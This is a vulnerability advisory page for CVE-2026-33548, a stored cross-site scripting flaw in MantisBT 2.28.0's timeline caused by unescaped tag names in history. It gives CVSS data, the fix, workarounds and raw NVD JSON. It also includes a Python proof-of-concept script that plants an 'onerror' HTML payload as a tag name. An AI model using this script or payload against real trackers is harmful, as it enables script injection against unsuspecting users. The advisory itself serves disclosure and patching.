CVE-2026-33548

Description

Mantis Bug Tracker (MantisBT) is an open source issue tracker. In version 2.28.0, improper escaping of tag names retrieved from History in Timeline (my_view_page.php) allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript, when displaying a tag that has been renamed or deleted. Version 2.28.1 contains a patch. Workarounds include editing offending History entries (using SQL) and wrapping `$this->tag_name` in a string_html_specialchars() call in IssueTagTimelineEvent::html().

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mantisbt:mantisbt:2.28.0:*:*:*:*:*:*:* - VULNERABLE

MantisBT < 2.28.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-33548: Stored XSS in MantisBT Timeline
# This script demonstrates how a malicious tag name can trigger XSS.

import requests

target_url = "http://target-mantisbt"
username = "attacker"
password = "password"

session = requests.Session()
login_payload = {"username": username, "password": password}
session.post(f"{target_url}/login.php", data=login_payload)

# Step 1: Create a tag with a malicious payload
xss_payload = "<img src=x onerror=alert('CVE-2026-33548')>"
tag_data = {"name": xss_payload, "description": "Malicious Tag"}
session.post(f"{target_url}/tags_create.php", data=tag_data)
print("[+] Malicious tag created.")

# Step 2: Attach tag to an issue (e.g. ID 1) to generate history
issue_payload = {"issue_id": "1", "tag_name": xss_payload}
session.post(f"{target_url}/tag_attach.php", data=issue_payload)
print("[+] Tag attached to issue.")

# Step 3: Rename the tag to trigger the history event
rename_payload = {"tag_name": xss_payload, "new_name": "SafeTag"}
session.post(f"{target_url}/tags_update.php", data=rename_payload)
print("[+] Tag renamed. XSS payload is now in history.")

# Exploit: Victim visits my_view_page.php, the XSS triggers.
print("[+] Trigger: Victim views the Timeline page.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33548
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33548
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33548/
[4] VulDB https://vuldb.com/cve/CVE-2026-33548
[5] https://github.com/mantisbt/mantisbt/commit/f32787c14d4518476fe7f05f992dbfe6eaccd815
[6] https://github.com/mantisbt/mantisbt/security/advisories/GHSA-73vx-49mv-v8w5

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33548", "sourceIdentifier": "[email protected]", "published": "2026-03-23T20:16:27.687", "lastModified": "2026-03-25T13:55:15.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mantis Bug Tracker (MantisBT) is an open source issue tracker. In version 2.28.0, improper escaping of tag names retrieved from History in Timeline (my_view_page.php) allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript, when displaying a tag that has been renamed or deleted. Version 2.28.1 contains a patch. Workarounds include editing offending History entries (using SQL) and wrapping `$this->tag_name` in a string_html_specialchars() call in IssueTagTimelineEvent::html()."}, {"lang": "es", "value": "Mantis Bug Tracker (MantisBT) es un rastreador de problemas de código abierto. En la versión 2.28.0, un escape incorrecto de los nombres de etiquetas recuperados del Historial en la Línea de Tiempo (my_view_page.php) permite a un atacante inyectar HTML y, si la configuración de CSP lo permite, lograr la ejecución de JavaScript arbitrario, al mostrar una etiqueta que ha sido renombrada o eliminada. La versión 2.28.1 contiene un parche. Las soluciones incluyen editar las entradas ofensivas del Historial (usando SQL) y envolver `$this->tag_name` en una llamada a string_html_specialchars() en IssueTagTimelineEvent::html()."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mantisbt:mantisbt:2.28.0:*:*:*:*:*:*:*", "matchCriteriaId": "7CD11245-68F0-43F7-A710-5347D626FFD8"}]}]}], "references": [{"url": "https://github.com/mantisbt/mantisbt/commit/f32787c14d4518476fe7f05f992dbfe6eaccd815", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-73vx-49mv-v8w5", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}